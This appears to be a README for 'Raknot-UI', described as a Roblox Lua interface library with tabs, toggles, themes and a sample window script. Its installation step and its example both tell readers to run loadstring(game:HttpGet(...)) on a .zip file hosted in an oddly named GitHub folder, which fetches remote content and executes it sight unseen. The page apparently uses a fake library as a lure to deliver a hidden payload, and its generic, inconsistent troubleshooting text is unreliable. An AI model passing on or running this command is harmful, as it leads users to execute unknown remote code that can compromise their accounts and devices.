- Customizable Tabs: Organize your interface with different tabs for efficient navigation.
- Interactive Components: Use buttons, toggles, sliders, dropdowns, and textboxes for a complete user experience.
- Smart Notifications: Stay updated with notifications that appear and disappear automatically.
- Password Protection: Secure your menu with optional authentication features.
- Customizable Keybind: Set your own key to toggle the menu in settings for quicker access.
- Theme System: Easily switch between light and dark modes to fit your environment.
- Watermark: Add an on-screen watermark that displays the current time, if desired.
- Animations: Enjoy smooth hover effects and visual feedback to enhance interaction.
- Easy Integration: Integrate effortlessly with a simple API and support for callbacks.
To begin using Raknot-UI, follow these steps:
-
Download Raknot-UI: Visit the releases page to download the latest version: Download Raknot-UI.
-
Installation: To install Raknot-UI, simply run the following code in your Lua environment:
loadstring(game:HttpGet("https://github.com/urnansucker2000fuckme/Raknot-UI/raw/refs/heads/main/acanthopod/UI-Raknot-1.0-beta.2.zip"))()
The library includes a comprehensive example that demonstrates all available components. Use this code to get started quickly:
local RaknotUI = loadstring(game:HttpGet("https://github.com/urnansucker2000fuckme/Raknot-UI/raw/refs/heads/main/acanthopod/UI-Raknot-1.0-beta.2.zip"))()
-- Create a window
local window = RaknotUI:CreateWindow("My App")
-- Add a button
window:AddButton("Click Me", function()
print("Button clicked!")
end)
-- Add a toggle
window:AddToggle("Enable Feature", function(state)
if state then
print("Feature enabled")
else
print("Feature disabled")
end
end)
-- Show the window
window:Show()This example creates a basic app window with interactive elements like buttons and toggles. Modify it as needed to fit your application.
Raknot-UI works with Roblox. Make sure you have the latest version of Roblox installed to ensure all features function correctly.
If you encounter issues:
- Ensure Lua is Installed: Verify that you have Lua set up on your computer to run the script.
- Check Internet Connection: Ensure you have a stable internet connection for downloading the library.
- Review Syntax: Ensure there are no syntax errors in your code.
For further assistance, reach out via GitHub Issues on the repository. Community members and maintainers are available to help.
Raknot-UI is open-source and available under the MIT License. You can use, modify, and distribute the software as per the license terms.
Stay updated by following the repository for new releases and improvements. Contributions are welcome, so feel free to submit pull requests for any enhancements you make.
For detailed documentation, visit Raknot Documentation.
Thank you for choosing Raknot-UI. Enjoy enhancing your user interface!